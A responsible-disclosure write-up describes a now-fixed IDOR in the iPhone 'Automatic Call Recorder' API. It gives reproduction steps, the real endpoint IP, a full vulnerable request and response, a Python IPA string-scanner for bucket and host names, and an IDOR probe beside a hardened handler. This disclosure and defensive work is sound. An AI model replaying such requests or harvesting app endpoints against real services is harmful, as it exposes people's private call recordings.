How We Could Have Listened to Anyone’s Call Recordings

Written by appsecure | Published 2022/02/18
Tech Story Tags: devops-security | devops | cloud-security | cloud | bug-bounty | call-recording | vulnerabilities | app-store

TL;DR: The “Automatic Call Recorder” application is one of the popular applications used by iPhone users to record their calls. An attacker could pass another user’s phone number in the recordings request, and the API would respond with the recording’s storage bucket URL without any authentication. The vulnerability was responsibly disclosed by Anand Prakash and PingSafe and is now fixed. PingSafe decompiled the IPA file and identified the S3 buckets, hostnames, and other sensitive details used by the application.

This vulnerability was responsibly disclosed by Anand Prakash of PingSafe and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and with getting this critical vulnerability fixed.

The “Automatic Call Recorder” application is one of the popular applications used by iPhone users to record their calls. The app is among the top-grossing apps in the Business category of the App Store and is currently #15 by downloads in that category worldwide.

Summary:

We discovered this vulnerability while doing open-source intelligence across mobile applications in different categories. PingSafe decompiled the IPA file and identified the S3 buckets, hostnames, and other sensitive details used by the application. The vulnerability allowed any malicious actor to listen to any user’s call recordings from the application’s cloud storage bucket: an unauthenticated API endpoint leaked the storage URL of the victim’s data, and that URL was all that was needed to fetch the recording.
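As an added example (not part of the original write-up and not PingSafe’s tooling), the string-harvesting pass that recovers bucket names, hostnames and IP endpoints from an IPA can be scripted: an IPA is a zip archive, so unpacking it and pulling printable strings out of the app binary is enough to surface hard-coded endpoints. The archive contents, bucket names, host and IP below are constructed for the example.

```python
import io
import re
import zipfile

# Printable-ASCII runs of 6+ bytes, the same heuristic the `strings` tool uses.
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{6,}")
# Virtual-hosted (bucket.s3[.region].amazonaws.com) and path-style
# (s3[.region].amazonaws.com/bucket) S3 references.
S3_RE = re.compile(
    r"(?<![\w.-])(?:"
    r"(?P<vhost>[a-z0-9][a-z0-9.-]{1,61})\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com"
    r"|s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com/(?P<path>[a-z0-9][a-z0-9.-]{1,61})"
    r")"
)
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s\"'<>]*)?")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\b")


def extract_strings(blob: bytes):
    """Return the printable-ASCII runs embedded in a binary blob."""
    return [m.group().decode("ascii") for m in PRINTABLE_RE.finditer(blob)]


def scan_ipa(ipa_bytes: bytes) -> dict:
    """Walk every file in the IPA (a zip) and collect hard-coded endpoints."""
    found = {"s3_buckets": set(), "urls": set(), "ip_endpoints": set()}
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as ipa:
        for info in ipa.infolist():
            if info.is_dir():
                continue
            for s in extract_strings(ipa.read(info.filename)):
                for m in S3_RE.finditer(s):
                    found["s3_buckets"].add(m.group("vhost") or m.group("path"))
                found["urls"].update(m.group() for m in URL_RE.finditer(s))
                found["ip_endpoints"].update(m.group() for m in IP_RE.finditer(s))
    return {k: sorted(v) for k, v in found.items()}


# Constructed stand-in for an app binary: a Mach-O magic, then a few embedded
# strings separated by non-printable bytes. Bucket names, host and IP are fictional.
SAMPLE_BINARY = (
    b"\xcf\xfa\xed\xfe" + b"\x00" * 8
    + b"https://example-recordings-bucket.s3.amazonaws.com/call_recordings/\x00"
    + b"\x7f\x01\x02"
    + b"http://198.51.100.23:80/fetch-sinch-recordings.php\x00"
    + b"s3.eu-west-1.amazonaws.com/example-backup-bucket\x00"
    + b"com.example.callrecorder\x00"
    + b"key\x00"  # shorter than 6 bytes: ignored, as `strings` would ignore it
)


def build_sample_ipa() -> bytes:
    """Constructed IPA layout: Payload/<App>.app/ holding an Info.plist and the binary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as ipa:
        ipa.writestr("Payload/Example.app/Info.plist",
                     "<plist><dict><key>CFBundleIdentifier</key>"
                     "<string>com.example.callrecorder</string></dict></plist>")
        ipa.writestr("Payload/Example.app/Example", SAMPLE_BINARY)
    return buf.getvalue()


if __name__ == "__main__":
    for kind, items in scan_ipa(build_sample_ipa()).items():
        print(kind)
        for item in items:
            print("  ", item)
```

On a real IPA the same scan is noisy (framework URLs, Apple hostnames), so the interesting follow-up is checking each recovered bucket and host for anonymous access rather than trusting the list as-is.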

Vulnerability Details:

This vulnerability existed in the “/fetch-sinch-recordings.php” API endpoint of the “Automatic Call Recorder” application. An attacker could pass another user’s phone number as the UserID in the recordings request, and the API would respond with the storage bucket URL of that user’s recordings without any authentication. The same response also leaked the victim’s entire call history, including the numbers called. In other words, the caller-supplied identifier was the only thing selecting whose data came back: a textbook case of broken object-level authorization (IDOR).

Steps to Reproduce:

  1. Install the “Automatic Call Recorder” application on your phone.
  2. Intercept the application’s traffic with Burp Suite or ZAP.
  3. Observe the POST request to 167.88.123.157:80/fetch-sinch-recordings.php and change the UserID value to the victim’s phone number, including the country code.
  4. The response contains the S3 URL of the recording and other sensitive details.

Vulnerable Request:

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{"UserID": "xxxxxx", "AppID": "xxx"}

Response:

HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/json

[
  {
    "start_time": "1604681",
    "start_time_iso": "2019-10-01T17:58:54+0100",
    "caller_number": "xxxxxxx",
    "callee": "+xxxxxxxxx",
    "marked_as_deleted": "0",
    "user_id": "xxxxxxxxxx",
    "sinch_app_id": "xxxxxxxxxxxx",
    "call_id": "xxxxxxx",
    "s3_key": "call_recordings/1011101/xyzrecording.wav"
  }
]
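The endpoint behaviour described in the vulnerability details and reproduced in the steps above, modelled as an added example (this is not the app’s actual PHP, which the write-up does not include): a handler that looks up recordings purely by the caller-supplied UserID, beside a hardened version that takes identity from the session, rejects a mismatching UserID, and returns short-lived signed links instead of raw bucket keys. The HMAC presigning is a stand-in for S3 presigned URLs; the session store, phone numbers and recording rows are constructed. idor_probe replays the request shape from the steps above and reports whether a victim’s rows come back.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlparse

# Constructed sample data shaped like the response fields above
# (user_id, callee, call_id, s3_key). Numbers are fictional.
ATTACKER = "+15550100001"
VICTIM = "+15550100002"
RECORDINGS = {
    ATTACKER: [{"user_id": ATTACKER, "callee": "+15550100003", "call_id": "c-1001",
                "start_time_iso": "2021-02-27T21:20:00+0530",
                "s3_key": "call_recordings/1001/a.wav"}],
    VICTIM: [{"user_id": VICTIM, "callee": "+15550100004", "call_id": "c-2001",
              "start_time_iso": "2021-02-27T21:25:00+0530",
              "s3_key": "call_recordings/2001/b.wav"}],
}
SESSIONS = {"tok-attacker": ATTACKER}   # bearer token -> authenticated user (constructed)
SIGNING_KEY = secrets.token_bytes(32)   # stand-in for the storage service's signing credential
URL_TTL = 300                           # seconds a download link stays valid


class AuthError(Exception):
    pass


def fetch_recordings_vulnerable(body, headers=None):
    """Models the flaw: the caller-supplied UserID alone selects whose recordings
    come back, no session is checked, and raw bucket keys are returned."""
    return [dict(r) for r in RECORDINGS.get(body.get("UserID"), [])]


def presign(s3_key, now):
    """Expiring, HMAC-signed download link (a stand-in for an S3 presigned URL)."""
    expires = now + URL_TTL
    sig = hmac.new(SIGNING_KEY, f"{s3_key}|{expires}".encode(), hashlib.sha256).hexdigest()
    return f"https://storage.example/{s3_key}?expires={expires}&sig={sig}"


def verify_presigned(url, now):
    """Storage-side check: the signature must match and the link must not be expired."""
    parts = urlparse(url)
    q = parse_qs(parts.query)
    expires = int(q.get("expires", ["0"])[0])
    if now > expires:
        return False
    msg = f"{parts.path.lstrip('/')}|{expires}".encode()
    expected = hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, q.get("sig", [""])[0])


def fetch_recordings_fixed(body, headers, now=None):
    """Hardened handler: identity comes from the session, never from the body; a
    UserID in the body must match it; rows carry short-lived links, not bucket keys."""
    now = int(time.time()) if now is None else now
    auth = (headers or {}).get("Authorization", "")
    if not auth.startswith("Bearer "):
        raise AuthError("missing bearer token")
    user_id = SESSIONS.get(auth[len("Bearer "):])
    if user_id is None:
        raise AuthError("invalid token")
    if body.get("UserID") not in (None, user_id):
        raise AuthError("UserID does not match the authenticated user")
    out = []
    for r in RECORDINGS.get(user_id, []):
        row = {k: v for k, v in r.items() if k != "s3_key"}
        row["download_url"] = presign(r["s3_key"], now)
        out.append(row)
    return out


def idor_probe(handler, token, victim_id):
    """Replay the captured request shape with a victim UserID, with or without a
    session. True means the endpoint handed back the victim's data."""
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    try:
        rows = handler({"UserID": victim_id, "AppID": "app"}, headers)
    except AuthError:
        return False
    return any(r.get("user_id") == victim_id for r in rows)


if __name__ == "__main__":
    print("vulnerable leaks:", idor_probe(fetch_recordings_vulnerable, None, VICTIM))
    print("fixed leaks:", idor_probe(fetch_recordings_fixed, "tok-attacker", VICTIM))
```

The two fixes are independent and both matter here: binding the lookup to the session closes the API leak, while replacing bucket keys with expiring links means that a key which does escape (a log line, a shared screenshot) no longer fetches audio from the bucket on its own.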


Timelines:

Feb 27th, 2021 09:20 PM IST — Vulnerability discovered by Anand Prakash from PingSafe.

Feb 27th, 2021 10:34 PM IST — The company did not have a responsible disclosure program. Reached out to Zack Whittaker for help with the responsible disclosure; issue forwarded to the developer.

March 6th, 2021 1:16 AM IST — Confirmation from TechCrunch that the developer would publish the new build shortly.

March 6th, 2021 08:52 PM IST — Bug fixed and the new version made live on the App Store.

Security issues like this are catastrophic in nature. Along with impacting customers’ privacy, they also dent the company’s image and hand an advantage to its competitors.

This article was first published here

About Us:

PingSafe is a cloud-agnostic, agentless CSPM & CWPP solution that continuously detects and prevents vulnerabilities that have the highest probability of being exploited in Azure, AWS, Google Cloud, and Kubernetes.

Reach out to us at hello@pingsafe.com


Written by appsecure | Founder PingSafe.
Published by HackerNoon on 2022/02/18